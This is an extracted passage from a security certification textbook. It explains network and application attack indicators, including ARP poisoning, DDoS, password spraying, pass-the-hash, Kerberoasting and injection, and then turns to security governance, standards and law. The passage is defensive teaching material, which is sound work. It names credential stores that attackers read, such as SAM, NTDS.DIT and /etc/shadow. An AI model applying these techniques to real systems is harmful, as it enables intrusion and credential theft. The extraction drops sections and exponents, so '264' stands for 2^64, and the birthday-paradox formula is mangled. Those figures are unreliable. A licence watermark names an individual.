the network. Host discovery identifies which IP addresses are in use. Service
discovery identifies which TCP or UDP ports are open on a given host.
Fingerprinting identifies the application types and versions of the software
operating each port, and potentially of the operating system running on the
host, and its device type. Rapid scanning generates a large amount of distinctive
network traffic that can be detected and reported as an intrusion event, but it
is very difficult to differentiate malicious scanning activity from non-malicious
scanning activity.
• Denial of service (DoS) in a network context refers to attacks that cause hosts
and services to become unavailable. This type of attack can be detected by
monitoring tools that report when a host or service is not responding, or is
suffering from abnormally high volumes of requests. A DoS attack might be
launched as an end in itself, or to facilitate the success of other types of attacks.
• Weaponization, delivery, and breach refer to techniques that allow a threat actor
to get access without having to authenticate. This typically involves various types
of malicious code being directed at a vulnerable application host or service over
the network, or sending code concealed in file attachments, and tricking a user
into running it.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Note that stages in the lifecycle are iterative. For example, a threat actor might perform
external reconnaissance and credential harvesting or breach to obtain an initial
foothold. They might then perform reconnaissance and credential harvesting from the
foothold to perform lateral movement and privilege escalation on internal hosts.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Reflected Attacks
Assembling and managing a botnet large enough to overwhelm a network that has
effective DDoS mitigation measures can be a costly endeavor. This has prompted
threat actors to devise DDoS techniques that increase the effectiveness of each
attack. In a distributed reflected DoS (DRDoS) attack, the threat actor spoofs
the victim’s IP address and attempts to open connections with multiple third-party
servers. Those servers direct their SYN/ACK responses to the victim host. This
rapidly consumes the victim’s available bandwidth.
An asymmetric threat is one where the threat actor is able to perpetrate effective attacks
despite having fewer resources than the victim.
Amplified Attacks
An amplification attack is a type of reflected attack that targets weaknesses in
specific application protocols to make the attack more effective at consuming
target bandwidth. Amplification attacks exploit protocols that allow the attacker to
manipulate the request in such a way that the target is forced to respond with a
large amount of data. Protocols commonly targeted include domain name system
(DNS), Network Time Protocol (NTP), and Connectionless Lightweight Directory
Access Protocol (CLDAP). Another example of a particularly effective attack exploits
the memcached database caching system used by web servers.
DDoS Indicators
DDoS attacks can be diagnosed by traffic spikes that have no legitimate explanation,
but they can usually only be mitigated by providing high availability services, such
as load balancing and cluster services. In some cases, a stateful firewall can detect
a DDoS attack and automatically block the source. However, for many of the
techniques used in DDoS attacks, the source addresses will be randomly spoofed or
launched by bots, making it difficult to stop the attack at the source.
Dropping traffic from blocklisted IP ranges using Security Onion IDS. (Screenshot used
with permission from Security Onion.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
On-Path Attacks
An on-path attack is where the threat actor gains a position between two hosts,
and transparently captures, monitors, and relays all communication between them.
Because the threat actor relays the intercepted communications, the hosts might
not be able to detect the presence of the threat actor. An on-path attack could also
be used to covertly modify the traffic. For example, an on-path host could present
a workstation with a spoofed website form to try to capture the user credential.
This attack is also referred to as a on-path attack or as an adversary-in-the-middle
(AitM) attack.
On-path attacks can be launched at any network layer. One infamous example
attacks the way layer 2 forwarding works on local segments. The Address
Resolution Protocol (ARP) identifies the MAC address of a host on the local
segment that owns an IPv4 address. An ARP poisoning attack uses a packet crafter,
such as Ettercap, to broadcast unsolicited ARP reply packets. Because ARP has no
security mechanism, the receiving devices trust this communication and update
their MAC:IP address cache table with the spoofed address.
Packet capture opened in Wireshark showing ARP poisoning. (Screenshot used with permission
from wireshark.org.)
This screenshot shows packets captured during a typical ARP poisoning attack:
• In frames 6–8, the attacking machine (with MAC address ending :4a) directs
gratuitous ARP replies at other hosts (:76 and :77), claiming to have the IP
addresses .2 and .102. This pattern of gratuitous ARP traffic is an indicator
of the attack.
• In frame 9, the .101/:77 host tries to send a packet to the .2 host, but it is
received by the attacking host (with the destination MAC :4a).
• In frame 10, the attacking host retransmits frame 9 to the actual .2 host.
Wireshark colors the frame black and red to highlight the retransmission.
• In frames 11 and 12, you can see the reply from .2, received by the attacking host
in frame 11 and retransmitted to the legitimate host in frame 12.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The usual target will be the subnet’s default gateway (the router that accesses other
networks). If the ARP poisoning attack is successful, all traffic destined for remote
networks will be received by the attacker, implementing an on-path attack.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
DNS is also a popular choice for implementing command & control (C&C) of remote
access Trojans. It can be used as a means of covertly exfiltrating data from a private
network.
Wireless Attacks
Wireless networks present particular security challenges and are frequently the
vector for various types of attacks.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Surveying Wi-Fi networks using MetaGeek inSSIDer. The Struct-Guest network shown in
the first window is the legitimate one and has WPA2 security configured. The evil twin
has the same SSID, but a different BSSID (MAC address), and open authentication.
(MetaGeek, Inc. © Copyright 2005–2023.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Password Attacks
When a user chooses a password, the plaintext value is converted to a
cryptographic hash. This means that, in theory, no one except the user (not even
the systems administrator) knows the password, because the plaintext should not
be recoverable from the hash. A password attack aims to exploit the weaknesses
inherent in password selection and management to recover the plaintext and use it
to compromise an account.
Online Attacks
An online password attack is where the threat actor interacts with the authentication
service directly—a web login form or VPN gateway, for instance. An online password
attack can show up in audit logs as repeatedly failed logins and then a successful
login, or as successful login attempts at unusual times or locations. Apart from
ensuring the use of strong passwords by users, online password attacks can be
mitigated by restricting the number or rate of login attempts, and by shunning login
attempts from known bad IP addresses.
Note that restricting logins can be turned into a vulnerability as it exposes the account
to denial of service attacks. The attacker keeps trying to authenticate, locking out valid
users.
Offline Attacks
An offline attack means that the attacker has managed to obtain a database of
password hashes, such as %SystemRoot%\System32\config\SAM,
%SystemRoot%\NTDS\NTDS.DIT (the Active Directory credential store) or
/etc/shadow. Once the password database has been obtained, the cracker
does not interact with the authentication system. The only indicator of this type of
attack (other than misuse of the account in the event of a successful attack) is a file
system audit log that records the malicious account accessing one of these files.
Threat actors can also read credentials from host memory, in which case the only
reliable indicator might be the presence of attack tools on a host.
If the attacker cannot obtain a database of passwords, a packet sniffer might
be used to obtain the client response to a server challenge in an authentication
protocol. Some protocols send the hash directly; others use the hash to derive
an encryption key. Weaknesses in protocols using derived keys can allow for the
extraction of the hash for cracking.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Password Spraying
Password spraying is a horizontal brute force online attack. This means that the
attacker chooses one or more common passwords (for example, password or
123456) and tries them in conjunction with multiple usernames.
In terms of network attacks, credential replay attacks mostly target Windows Active
Directory networks. There are also credential replay attacks that target
web applications. We will discuss these in the next topic.
• Service tickets for applications where the user has started a session.
• NT hash of local and domain user and service accounts that are currently signed
in, whether interactively or remotely over the network. Early Windows business
networks used NT LAN Manager (NTLM) challenge and response authentication.
While the NTLM protocol is deprecated for most uses, the NT hash is still used
as the credential storage format. The NT hash is used where legacy NTLM
authentication is still allowed, and can be involved in signing Kerberos requests
and responses.
Critical for network security, if different users are signed in on the same host,
secrets for all these accounts could be cached by LSASS. If some of these accounts
are for more privileged users, such as domain administrators, a threat actor might
be able to use the secrets to escalate privileges.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LSASS purges hashes from memory within a few minutes of the user signing out.
The SAM database caches local and Microsoft account credentials, but not domain
credentials. Some editions of Windows implement a virtualization feature called
Credential Guard to protect these secrets from malicious processes, even if they have
SYSTEM permissions.
Credential replay attacks use various mechanisms to obtain and exploit these locally
stored secrets to start authenticated sessions on other hosts and applications on
the network. For example, if a threat actor can obtain an NT hash, they can use a
pass the hash (PtH) attack to start a session on another host if that host is running a
service such as file sharing or remote desktop that still allows NTLM authentication.
The pass the hash process. The Security Accounts Manager (SAM) is a Windows registry
database that stores local account credentials. (Images © 123RF.com.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Cryptographic Attacks
Attacks that target authentication systems often depend on the system using weak
cryptography.
Downgrade Attacks
A downgrade attack makes a server or client use a lower specification protocol
with weaker ciphers and key lengths. For example, a combination of an on-path and
downgrade attack on HTTPS might try to force the client to use a weak version of
transport layer security (TLS) or even downgrade to the legacy secure sockets layer
(SSL) protocol. This makes it easier for a threat actor to force the use of weak cipher
suites and forge the signature of a certificate authority that the client trusts.
A type of downgrade attack is used to attack Active Directory. A Kerberoasting
attack attempts to discover the passwords that protect service accounts by
obtaining service tickets and subjecting them to brute force password cracking
attacks. If the credential portion of the service ticket is encrypted using AES, it is
very hard to brute force. If the attack is able to cause the server to return the ticket
using weak RC4 encryption, a cracker is more likely to be able to extract the service
password.
Evidence of downgrade attacks is likely to be found in server logs or by intrusion
detection systems.
Collision Attacks
A collision is where a weak cryptographic hashing function or implementation
allows the generation of the same digest value for two different plaintexts. A
collision attack exploits this vulnerability to forge a digital signature. The attack
works as follows:
1. The attacker creates a malicious document and a benign document that
produce the same hash value. The attacker submits the benign document
for signing by the target.
2. The attacker then removes the signature from the benign document and adds
it to the malicious document, forging the target’s signature.
Birthday Attacks
A collision attack depends on being able to create a malicious document that
outputs the same hash as the benign document. Some collision attacks depend
on being able to manipulate the way the hash is generated. A birthday attack is
a means of exploiting collisions in hash functions through brute force. Brute force
means attempting every possible combination until a successful one is achieved.
The attack is named after the birthday paradox. This paradox shows that the
computational time required to brute force a collision might be less than expected.
The birthday paradox asks how large must a group of people be so that the chance
of two of them sharing a birthday is 50%. The answer is 23, but people who are
not aware of the paradox often answer around 180 (365/2). The point is that
the chances of someone sharing a particular birthday are small, but the chances
of any two people in a group sharing any birth date in a calendar year get
better and better as you add more people: 1 – (365 * (365 − 1) * (365 – 2) ...
* (365 – (N − 1)/365N).
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
To exploit the paradox, the attacker creates multiple malicious and benign
documents, both featuring minor changes (punctuation, extra spaces, and so on).
Depending on the length of the hash and the limits to the non-suspicious changes
that can be introduced, if the attacker can generate sufficient variations, then the
chance of matching hash outputs can be better than 50%. This effectively means
that a hash function that outputs 128-bit hashes can be attacked by a mechanism
that can generate 264 variations. Computing 264 variations will take much less time
than computing 2128 variations.
Attacks that exploit collisions are difficult to launch, but the principle behind the
attack informs the need to use authentication methods that use both strong ciphers
and strong protocol and software implementations.
• Credential dumping—the malware might try to access the credentials file (SAM
on a local Windows workstation) or sniff credentials held in memory by the lsass.
exe system process. Additionally, a DCSync attack attempts to trick a domain
controller into replicating its user list along with their credentials with a rogue
host.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Network Attack Indicators
8
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 13C
Application Attack Indicators
5
A web application exposes many interfaces to public networks. Attackers can exploit
vulnerabilities in server software and in client browser security to perform injection
and session hijacking attacks that compromise data confidentiality and integrity.
Understanding how these attacks are perpetrated and being able to diagnose their
indicators from appropriate data sources will help you to prevent and remediate
intrusion events.
Application Attacks
An application attack targets a vulnerability in OS or application software. An
application vulnerability is a design flaw that can cause the application security
system to be circumvented or that will cause the application to crash. There are
broadly two main scenarios for application attacks:
• Compromising the operating system or third-party apps on a network host by
exploiting Trojans, malicious attachments, or browser vulnerabilities. This allows
the threat actor to obtain a foothold on a local network.
Privilege Escalation
The purpose of most application attacks is to allow the threat actor to run their own
code on the system. This is referred to as arbitrary code execution. Where the
code is transmitted from one machine to another, it can be referred to as remote
code execution. The code would typically be designed to install some sort of
backdoor or to disable the system in some way.
An application or process must have privileges to read and write data and execute
functions. Depending on how the software is written, a process may run using a
system account, the account of the logged-on user, or a nominated account.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
If a software exploit works, the attacker may be able to execute arbitrary code with
the same privilege level as the exploited process. There are two main types of
privilege escalation:
• Vertical privilege escalation (or elevation) is where a user or application can
access functionality or data that should not be available to them. For instance, a
process might run with local administrator privileges, but a vulnerability allows
the arbitrary code to run with higher SYSTEM privileges.
Buffer Overflow
A buffer is an area of memory that an application reserves to store some value. The
application will expect the data to conform to some expected value size or format.
To exploit a buffer overflow vulnerability, the attacker passes data that deliberately
fills the buffer to its end and then overwrites data at its start. One of the most
common vulnerabilities is a stack overflow. The stack is an area of memory used
by a program subroutine. It includes a return address, which is the location of
the program that called the subroutine. An attacker could use a buffer overflow
to change the return address, allowing the attacker to run arbitrary code on the
system.
Operating systems use mechanisms such as address space layout randomization
(ASLR) and Data Execution Prevention (DEP) to mitigate risks from buffer overflow.
Failed attempts at buffer overflow can be identified through frequent process
crashes and other anomalies.
Replay Attacks
In the context of a web application, a replay attack most often means exploiting
cookie-based sessions. HTTP is nominally a stateless protocol, meaning that the
server preserves no information about the client. To overcome this limitation,
mechanisms such as cookies have been developed to preserve stateful data. A
cookie is created when the server sends an HTTP response header with the cookie
data. A cookie has a name and value, plus optional security and expiry attributes.
Subsequent request headers sent by the client will usually include the cookie.
Cookies are either nonpersistent cookies, in which case they are stored in memory
and deleted when the browser instance is closed, or persistent, in which case
they are stored in the browser cache until deleted by the user or pass a defined
expiration date.
Session management enables a web application to uniquely identify a user across
a number of different actions and requests. A session token identifies the user
and may also be used to prove that the user has been authenticated. A replay
attack works by capturing or guessing the token value, and then submitting it to
reestablish the session illegitimately.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Using The Browser Exploitation Framework (BeEF) to obtain the session cookie from a browser.
Attackers can capture cookies by sniffing network traffic via an on-path attack or
when they are sent over an unsecured network, like a public Wi-Fi hotspot. Malware
infecting a host is also likely to be able to capture cookies. Session cookies can also
be compromised via cross-site scripting (XSS).
Cross-site scripting (XSS) is an attack technique that runs malicious code in a browser in
the context of a trusted site or application.
Forgery Attacks
In contrast with replay attacks, a forgery attack hijacks an authenticated session to
perform some action without the user’s consent.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Injection Attacks
Attacks such as session replay, CSRF, and most types of XSS are client-side attacks.
This means that they execute arbitrary code on the browser. A server-side attack
causes the server to do some processing or run a script or query in a way that is
not authorized by the application design. Most server-side attacks depend on some
kind of injection attack.
An injection attack exploits some unsecure way in which the application processes
requests and queries. For example, an application might allow a user to view their
profile with a database query that should return the single record for that one
user’s profile. An application vulnerable to an injection attack might allow a threat
actor to return the records for all users, or to change fields in the record when they
are only supposed to be able to read them.
The persistent XSS and abuse of SQL queries and parameters discussed earlier in
the course are both types of injection attack. There are a number of other injection
attack types that pose serious threats to web applications and infrastructure.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
This defines an entity named bar that refers to a local file path. A successful attack
will return the contents of /etc/config as part of the response.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
URL Analysis
Session hijacking/replay, forgery, and injection attacks are difficult to identify, but
the starting points for detection are likely to be URL analysis and the web server’s
access log.
Data can be submitted to a server either by using a POST or PUT method and the
HTTP headers and body, or by encoding the data within the URL used to access
the resource. Data submitted via a URL is delimited by the ? character, which
follows the resource path. Query parameters are usually formatted as one or more
name=value pairs, with ampersands delimiting each pair.
The server response comprises the version number and a status code and message,
plus optional headers, and message body. An HTTP response code is the header
value returned by a server when a client requests a URL, such as 200 for “OK” or 404
for “Not Found.”
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Percent Encoding
A URL can contain only unreserved and reserved characters from the standard set.
Reserved characters are used as delimiters within the URL syntax and should only
be used unencoded for those purposes. The reserved characters are the following:
: / ? # [ ] @ ! $ & ' ( ) * + , ; =
There are also unsafe characters, which cannot be used in a URL. Control
characters, such as null string termination, carriage return, line feed, end of file,
and tab, are unsafe. Percent encoding allows a user-agent to submit any safe or
unsafe character (or binary data) to the server within the URL. Its legitimate uses
are to encode reserved characters within the URL when they are not part of the
URL syntax and to submit Unicode characters. Percent encoding can be misused
to obfuscate the nature of a URL (encoding unreserved characters) and submit
malicious input.
Web server access log showing an ordinary client (203.0.113.66) accessing a page and its
associated image resources, and then scanning activity from the Nikto app running
on 203.0.113.66. The scanning activity generates multiple 404 errors as it tries to map
the web app’s attack surface by enumerating common directories and files.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Application Attack Indicators
6
2. You are reviewing access logs on a web server and notice repeated
requests for URLs containing the strings %3C and %3E. Is this an event
that should be investigated further, and why?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 13
Summary
5
• Consider using threat data feeds to assist with identification of documented and
published indicators.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LESSON INTRODUCTION
Security governance is a critical aspect of an organization’s overall security
posture, providing a framework that guides the management of cybersecurity
risks. It involves developing, implementing, and maintaining policies, procedures,
standards, and guidelines to safeguard information assets and technical
infrastructure. Security governance encompasses the roles and responsibilities of
various stakeholders, emphasizing the need for a culture of security awareness
throughout the organization. Governance frameworks must manage and maintain
compliance with relevant laws, regulations, and contractual obligations while
supporting the organization’s strategic objectives. Effective security governance also
involves continuous monitoring and improvement to adapt to evolving threats and
changes in the business and regulatory environment.
Lesson Objectives
In this lesson, you will do the following:
• Identify the difference among policies, procedures, standards, and guidelines.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 14A
Policies, Standards, and Procedures
2
Policies, standards, and procedures are three key components that form
the foundation of an organization’s security program. Policies are high-level,
authoritative documents defining the organization’s security commitment.
Standards are more specific than policies and specify the methods used to
implement technical and procedural requirements. Procedures are detailed,
step-by-step instructions describing how to complete specific tasks and align to
the requirements provided in standards. Procedures provide clear directions for
individuals to perform their job duties consistently, securely, and efficiently.
Policies
Organizational policies are vital in establishing effective governance and ensuring
organizational compliance. They form the framework for operations, decision-
making, and behaviors, setting the rules for a compliant and ethical corporate
culture. Governance describes the processes used to direct and control an
organization, including the processes for decision-making and risk management.
Policies are the outputs of governance. They establish the rules that frame decision-
making processes, risk mitigation, fairness, and transparency. They set expectations
for performance, align the organization around common goals, prevent misconduct,
and remove inefficiencies.
Compliance describes how well an organization adheres to regulations, policies,
standards, and laws relevant to its operation. Organizational policies are critical in
ensuring compliance by integrating legal and regulatory requirements into daily
operations. Policies define the rules and procedures for maintaining compliance
and outline the consequences of noncompliance.
For example, an organization may have a data privacy policy that explains how
it will maintain compliance with relevant laws to protect customer data. The
policy details data collection, storage, processing, and sharing practices, including
employee responsibilities, to ensure that all organization members understand and
adhere to the rules. Organizational policies help facilitate compliance assessments
through internal and external audits as policies provide a roadmap auditors follow
to determine whether an organization is operating as it claims and is successfully
satisfying its regulatory obligations.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The goal of an AUP is to ensure that users do not engage in activities that
could harm the organization or its resources. Also, the AUP should detail the
consequences for noncompliance, including details regarding how compliance is
monitored and require employees to acknowledge their comprehension of the
AUP’s rules via signature.
Guidelines
Guidelines describe recommendations that steer actions in a particular job role
or department. They are more flexible than policies and allow greater discretion
for the individuals implementing them. Guidelines provide best practices
and suggestions on achieving goals and completing tasks effectively and help
individuals understand the required steps to comply with a policy or improve
effectiveness.
An example of a guideline might be related to help desk support practices
related to using email in response to employee support requests. The guideline
may recommend specific language, tone, or response times but would allow for
flexibility depending on the request’s circumstances. While both policies and
guidelines work to steer the actions and behaviors of employees, policies are
mandatory and define strict rules, whereas guidelines provide recommendations
and allow for more individual judgment and discretion. Regular review of guidelines
is important to ensure they remain practical and relevant. Periodic assessments and
updates to guidelines allow organizations to adapt them to changing technologies,
business operations, emerging threats, and evolving industry standards.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Procedures
Policies and guidelines set a framework for behavior. Procedures define step-by-
step instructions and checklists for ensuring that a task is completed in a way that
complies with policy.
Personnel Management
Identity and access management (IAM) involves both IT/security procedures and
technologies and Human Resources (HR) policies. Personnel management policies
are applied in three phases:
• Recruitment (hiring)—locating and selecting people to work in particular
job roles. Security issues here include screening candidates and performing
background checks.
Background Checks
A background check determines that a person is who they say they are and are
not concealing criminal activity, bankruptcy, or connections that would make them
unsuitable or risky. Employees working in high confidentiality environments or with
access to high-value transactions will obviously need to be subjected to a greater
degree of scrutiny. For some jobs, especially federal jobs requiring a security
clearance, background checks are mandatory. Some background checks are
performed internally, whereas others are done by an external third party.
Onboarding
Onboarding at the HR level is the process of welcoming a new employee to the
organization. The same sort of principle applies to taking on new suppliers or
contractors. Some of the same checks and processes are used in creating customer
and guest accounts.
As part of onboarding, the IT and HR function will combine to create an account
for the user to access the computer system, assign the appropriate privileges, and
ensure the account credentials are known only to the valid user. These functions
must be integrated, to avoid creating accidental configuration vulnerabilities, such
as IT creating an account for an employee who is never actually hired. Some of the
other tasks and processes involved in onboarding include the following:
• Secure Transmission of Credentials—creating and sending an initial password
or issuing a smart card securely. The process needs protection against rogue
administrative staff. Newly created accounts with simple or default passwords
are an easily exploitable backdoor.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
IAM automation can streamline onboarding by automating the provisioning and access
management tasks associated with new employees. It enables the automated creation
and configuration of user accounts, assignment of appropriate access privileges
based on established roles and access policies, and integration with HR systems for
efficient new employee data synchronization. IAM automation reduces manual effort,
ensures consistency, and improves security by enforcing standardized access controls,
ultimately accelerating onboarding while maintaining strong security practices.
Playbooks
Playbooks are essential to establishing and maintaining organizational procedures
by establishing a central repository of well-defined, standardized strategies and
tactics. They guide personnel to ensure consistency in operations and improve
quality and effectiveness.
Playbooks facilitate knowledge sharing and continuity as employees move into new
roles or leave the organization. Playbooks also mitigate risk by documenting critical
procedures and preserving institutional knowledge. Playbooks help new team
members quickly learn established processes while existing team members have a
reference point for their tasks.
Moreover, playbooks act as a tool for quality assurance and continuous
improvement. Clearly defining processes and the best practices to handle them
makes it easier to identify and improve problem areas. By using playbooks,
organizations can monitor the use and effectiveness of procedures over time and
modify them as necessary to foster an environment of continual learning and
development.
Most significantly, playbooks are essential in incident response and crisis
management because they detail emergency procedures and contingency plans
vital to steering activities during an emergency or crisis. Playbooks help incident
response teams make quick decisions and work more effectively under stress,
leading to more resilient operations and reducing the likelihood and impact of
major security incidents.
Several best practice guides and frameworks are available to assist in developing
playbooks, such as The MITRE ATT&CK framework https://attack.mitre.org, NIST Special
Publication 800-61 https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final, and
Open Source Security Automation (OSSA) https://www.opensecurityandsafetyalliance.
org/About-Us.
Change Management
The implementation of changes should be carefully planned, with consideration
for how the change will affect dependent components. For most significant or
major changes, organizations should attempt to trial the change first. Every change
should be accompanied by a rollback (or remediation) plan, so that the change
can be reversed if it has harmful or unforeseen consequences. Changes should
also be scheduled sensitively if they are likely to cause system downtime or other
negative impact on the workflow of the business units that depend on the IT system
being modified. Most networks have a scheduled maintenance window period for
authorized downtime. When the change has been implemented, its impact should
be assessed, and the process reviewed and documented to identify any outcomes
that could help future change management projects.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Offboarding
An exit interview (or offboarding) is the process of ensuring that an employee
leaves a company gracefully. Offboarding is also used when a project using
contractors or third parties ends. In terms of security, there are several processes
that must be completed:
• Account Management—disable the user account and privileges. Ensure that
any information assets created or managed by the employee but owned by the
company are accessible (in terms of encryption keys or password-protected
files).
• Company Assets—retrieve mobile devices, keys, smart cards, USB media, and
so on. The employee will need to confirm (and in some cases prove) that they
have not retained copies of any information assets.
Standards
Standards define the expected outcome of a task, such as a particular
configuration state for a server, or performance baseline for a service. The
selection and application of standards within an organization center on various
dynamic elements such as regulatory requirements, business-specific needs, risk
management strategies, industry practices, and stakeholder expectations.
Regulatory requirements are the primary driver for adopting standards. The unique
operational differences between organizations dictate varying legal requirements
and security, privacy, and data protection regulations. These requirements
often require implementing specific standards or using guidelines for achieving
compliance. The healthcare industry in the United States is a classic example,
where providers must comply with stringent data protection and privacy standards
established by the Health Insurance Portability and Accountability Act (HIPAA).
Depending on the nature of its operations, customer base, or technological
dependencies, each organization must adopt standards that specifically address
its needs. For example, organizations heavily utilizing credit card transactions will
adopt the PCI DSS standard to safeguard the cardholder data environment (CDE).
Similarly, cloud-reliant organizations often prefer adopting ISO/IEC 27017 and
ISO/IEC 27018 to ensure safe and secure cloud operations.
Risk management strategies organizations stress the need for appropriate
standards. Standards help identify, evaluate, and manage risks and fortify the
organization’s resilience against security incidents or data breaches. ISO/IEC 27001,
for example, provides a comprehensive framework for an information security
management system (ISMS) designed to aid organizations in effectively managing
security risks. Adherence to industry best practices also influences the adoption
of standards. Conforming to widely accepted and tested standards demonstrates
an organization’s commitment to upholding high security and data protection
levels to bolster the organization’s reputation and build trust with customers
and partners. Stakeholder expectations (such as customers, partners, vendors,
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Industry Standards
Common industry standards used by public and private organizations include the
following:
• ISO/IEC 27001—An international standard that provides an information security
management system (ISMS) framework to ensure adequate and proportionate
security controls are in place.
• PCI DSS (Payment Card Industry Data Security Standard)—A standard for
organizations that handle credit cards from major card providers, including
requirements for protecting cardholder data.
Internal Standards
Organizations also establish internal standards to ensure the safety and integrity of
operations and protect valuable resources such as data, intellectual property, and
hardware. Internal standards provide consistent descriptions to define and manage
important organizational practices. Standards differ from policies in a few ways.
A simplistic view of the differences between the two is that standards focus on
implementation, whereas policies focus on business practices.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Access control standards ensure that only authorized individuals can access the
systems and data they need to do their jobs to protect sensitive information and
help prevent accidental changes or damage. Internally developed access control
standards typically include the following elements:
• Access Control Models—Defines appropriate access models for different use
cases. Examples include role-based access control (RBAC), discretionary access
control (DAC), and mandatory access control (MAC), among others.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Encryption protects data from unauthorized access, and it is vital for securing
data both at rest (stored data) and in transit (data being transmitted). Encryption
standards identify the acceptable cipher suites and expected procedures needed to
provide assurance that data remains protected.
• Encryption Algorithms—Defines allowable encryption algorithms, such as
AES (Advanced Encryption Standard) for symmetric or ECC for asymmetric
encryption.
• Key Length—Defines the minimum allowable key lengths for different types of
encryption.
Legal Environment
Governance committees ensure their organizations abide by all applicable
cybersecurity laws and regulations to protect them from legal liability. The
governance committee must address these external considerations in the strategic
plan for the organization.
Governance committees must manage many legal risks, such as regulatory
compliance requirements, contractual obligations, public disclosure laws, breach
liability, privacy laws, intellectual property protection, licensing agreements, and
many others. Cybersecurity governance committees must interpret and translate
these legal requirements into operational controls to avoid legal trouble, act
ethically, and protect the organization.
The key frameworks, benchmarks, and configuration guides may be used to
demonstrate compliance with a country’s legal/regulatory requirements or with
industry-specific regulations. Due diligence is a legal term meaning that responsible
persons have not been negligent in discharging their duties. Negligence may
create criminal and civil liabilities. Many countries have enacted legislation that
criminalizes negligence in information management. In the United States, for
example, the Sarbanes-Oxley Act (SOX) mandates the implementation of risk
assessments, internal controls, and audit procedures. The Computer Security Act
(1987) requires federal agencies to develop security policies for computer systems
that process confidential information. In 2002, the Federal Information Security
Management Act (FISMA) was introduced to govern the security of data processed
by federal government agencies.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Global Law
As information systems become more interconnected globally, many countries have
enacted laws with broader, international reach. Some examples include the General
Data Protection Regulation (GDPR) and California Consumer Privacy Act (CCPA)
which both act to protect the privacy of the constituents associated with each
respective law irrespective of geopolitical boundaries.
Varonis’s blog contains a useful overview of privacy laws in the United States (varonis.
com/blog/us-privacy-laws).
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Financial Services
• Gramm-Leach-Bliley Act (GLBA) (United States)
Telecommunications
• Communications Assistance for Law Enforcement Act (CALEA) (United States)
Energy
• North American Electric Reliability Corporation (NERC) (United States and
Canada)
Government
• Federal Information Security Modernization Act (FISMA) (United States)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Governance Boards
Governance boards are crucial in ensuring an organization’s effective security
governance and oversight because they are responsible for setting strategic
objectives, policies, and guidelines for security practices and risk management.
Governance boards oversee the implementation of security controls, work
closely with risk management teams to ensure compliance with relevant laws
and regulations, and evaluate the security program’s overall effectiveness.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Agency Description
Regulatory Agencies Regulatory agencies establish and enforce
security standards, regulations, and guidelines.
They oversee compliance with laws related to
specific sectors such as finance, healthcare,
telecommunications, and energy.
Intelligence Agencies Intelligence agencies gather and analyze
information to identify and counteract potential
security threats and provide this information
to national-level government groups to steer
national policy and military strategy.
Law Enforcement Agencies Law enforcement agencies enforce laws and
regulations related to public safety and security.
They investigate and prosecute criminal
activities, including cybercrimes and terrorist
activities.
Defense and Military Defense and military organizations are
Organizations responsible for safeguarding national security
and protecting the country from external
threats. They develop strategies, policies, and
capabilities to address physical security, border
control, and defense-related cybersecurity.
Data Protection Authorities Data protection authorities focus on protecting
personal data and privacy rights. They enforce
data protection regulations and provide
guidance on the best practices for securing
personal information.
National Cybersecurity National cybersecurity agencies focus on
Agencies protecting critical infrastructure, government
networks, and national cybersecurity interests.
They develop cybersecurity strategies,
coordinate incident response, and provide
guidance on cybersecurity practices for
government entities and private organizations.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
